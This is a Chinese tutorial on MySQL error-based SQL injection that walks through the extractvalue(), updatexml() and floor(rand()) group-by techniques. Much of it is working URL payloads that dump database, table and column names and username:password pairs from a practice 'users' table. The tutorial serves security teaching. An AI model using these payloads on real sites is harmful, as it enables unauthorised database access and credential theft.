extractValue()报错注入

什么是报错注入?

这是一种页面响应形式。响应过程如下:

  1. 用户在前台页面输入检索内容
  2. 后台将前台页面上输入的检索内容无加区别的拼接成 sql 语句,送给数据库执行
  3. 数据库将执行的结果返回给后台,后台将数据库执行的结果无加区别的显示到前台页面上

两个“无加区别” ← 报错注入存在的基础 → 后台对于输入输出的合理性没有做检查。

利用报错信息,得到想要的内容

通过 extractValue()报错注入

函数 extractValue()包含两个参数

extractValue(XML 文档对象名称, 路径)

示例

创建数据库 ctfstu 和数据表 xml 为示例,展示 extractValue()的用法

​ 1、先在 ctfstu 数据库中创建 xml

create database ctfstu charset utf8;
create table xml(doc varchar(150));

​ 2、在表内插入两端数据

insert into xml values('
                       <book>
                       <title>A bad boy how to get a girlfrind</title>
                       <author>
                       <initial>Love</initial>
                       <surname>benben</surname>
                       </author>
                       </book>
');

insert into xml values('
                       <book>
                       <title>how to become a bad boy</title>
                       <author>
                       <initial>hualong</initial>
                       <surname>Melton</surname>
                       </author>
                       </book>
');

​ 3、使用 extractvalue 查询 xml 里面的内容

​ 查询作者是谁

select extractvalue(doc,'/book/author/surname') from xml;

​ 查询书名

select extractvalue(doc,'/book/title') from xml;

如果把查询参数路径写错,只会查询不到内容,但不会报错

想要报错,则把查询参数格式符号写错

select extractvalue(doc,'~book/title') from xml;

在报错时会回显报错的语句,因此可以构造报错的语句,使先查询到一部分内容后再报错,返回整体内容

构造语句:

select extractvalue(doc,concat(0x7e,(select database()))) from xml;

利用exctractvalue()进行报错注入

?id=100' union select 1,extractvalue(1,concat(0x7e,(select database()))),3 --+
#concat用于拼接第一和第二个参数,0x7e → “~” 
#extractvalue的第一个参数可以随便写

concat第二个参数写进想查询的内容即可,同联合查询的后面的内容。

报错注入默认一次只能返回32个字符串

使用函数substring解决只能返回32个字符串问题

substring() 三个参数

  1. 第一个参数:控制输出的字符串
  2. 第二个参数:从哪开始输出
  3. 第三个参数:一次输出几位字符串
?id=100' union select 1,extractvalue(1,concat(0x7e,(select substring(group_concat(username,password) from users),31,30))),3 --+
#只能拼接字符串,从第31个字符开始,向后输出30个字符

Updatexml()报错注入

updatexml(XML_dacument,XPath_string,new_value)包含三个参数

  1. 第一个参数:XML_document是string格式,为XML文档对象的名称,例如Doc
  2. 第二个参数:XPath_string是路径,XPath格式的字符串
  3. 第三个参数:new_value,string格式,替换查找到的符合条件的数据

updatexml报错原理

同extractvalue(),输入错误的第二个参数,即更改路径的符号

正常句式:

select updatexml(doc,'/book/auther/surname','1') from xml;

错误句式:

select updatexml(doc,'~book/auther/surname','1') from xml;

只能回显32位字符串,仍要使用substring控制回显的字符数

过程

select updatexml(1,concat(0x7e,(select database())),'3') from xml;
#查库名
select updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database())),'3') from xml;
#查表名
select updatexml(1,concat(0x7e,(select substring(group_concat(username,':',password),1,30) from users)),'3') from xml;
#查看数据

总结知识点

  1. 判断字符型(及其闭合方式)/数字型
  2. 靶机用户名密码存放位置的表名和列名

​ 数据库information_schema中的数据表tables下数据列table_name和数据表columns下数据列column_name

floor报错

报错显示可以显示64位

rand()函数:随即返回0~1间的小数

floor()函数:小数向下取整数。向上取整数ceiling()

concat_ws()函数:将括号内数据用第一个字段连接起来

group by字句:分组语句,常用于 结合统计函数,根据一个或多个列,多结果集进行分组

as:别名

count()函数:汇总统计数量

limit:这里用于显示指定行数

?id=0' union select 1,count(*),concat_ws('-',(select concat('~',id,username,':',password) from users limit 0,1),floor(rand(0)*2)) as a from information_schema.tables group by a --+

rand()函数

随机返回0~1间的小数

select rand();
#随机返回0~1间的小数
select rand()*2;
#随机返回0~2间的小数
select rand() from users;
#根据表users的行数随机显示结果,表中有多少行,就显示多少行随机结果

floor()函数

小数向下取整数

select floor(rand()*2);
#结果随机为0或者1

concat_ws()函数

将括号内数据用第一个字段连接起来

select concat_ws('1','2','3');
#把2和3用1连接起来
select concat_ws('~',(select database()),floor(rand()*2));
#将返回:数据库名~0 或者数据库名~1

as别名,group by分组

select concat_ws('~',(select database()),floor(rand()*2)) as a from users group by a;
#在数据表a下面能够分出的组数,返回 数据库名~0 或者数据库名~1

count()函数

汇总统计数量

select count(*),concat_ws('~',(select database()),floor(rand()*2)) as a from users group by a;

偶尔出现报错#1062 - Duplicate entry ‘security-0’ for key ‘’

报错原理

报错语法和报错位置

select floor(rand()*2) from users;
#根据表users的行数随机显示0或1
select floor(rand(0)*2) from users;
#计算不再随机,而是按一定的顺序排列
select floor(rand(1)*2) from users;
......

select count(*),concat_ws('-'(select database()),floor(rand(0)*2)) as a from users group by a;
select count(*),concat_ws('-'(select database()),floor(rand(1)*2)) as a from users group by a;
......
select count(*),concat_ws('-'(select database()),floor(rand(0)*2)) as a from users group by a;
#rand()函数进行分组group by和统计count()时可能会多次执行,导致键值key重复
SQL注入——报错注入插图

在写入group_key键值时,不能直接将计算后的数值写入,而是再次计算后的数值进行写入

初始时,security-0/1的键值不存在,因此重新计算后写入键值,写入的键值如果在表格中有重复,则报错。

而在第一次统计时,若表中有相同的值,则直接进行计算。

因此,若表中同时有security-0和security-1时,则不进行报错。

select count(*),concat_ws('-',(select database())) as a from users group by a;
#group by作用是让rand()产生足够多次数的计算,一般使用行数比较多的默认数据表information_schema.tables

而后进行相同的注入操作即可。

注入操作

查表名

?id=0' union select 1,count(*),concat_ws('-',(select group_concat(table_name)from information_schema.tables where table_schema=database()),floor(rand(0)*2)) as a from information_schema.tables group by a --+
#group_concat可能无法显示,可以改成concat尝试
?id=0' union select 1,count(*),concat_ws('-',(select concat(table_name)from information_schema.tables where table_schema=database()),floor(rand(0)*2)) as a from information_schema.tables group by a --+

查列名

?id=0' union select 1,count(*),concat_ws('-',(select group_concat(column_name)from information_schema.columns where table_name='security'),floor(rand(0)*2)) as a from information_schema.tables group by a --+

查表中内容

?id=0' union select 1,count(*),concat_ws('-',(select group_concat('-',username,':',password)from users),floor(rand(0)*2)) as a from information_schema.tables group by a --+

使用limit控制内容输出

?id=0' union select 1,count(*),concat_ws('-',(select group_concat('-',username,':',password)from users limit 0,1),floor(rand(0)*2)) as a from information_schema.tables group by a --+
#从第一行第一个字符开始输出
?id=0' union select 1,count(*),concat_ws('-',(select group_concat('-',username,':',password)from users limit 1,1),floor(rand(0)*2)) as a from information_schema.tables group by a --+
#从第二行第一个字符开始输出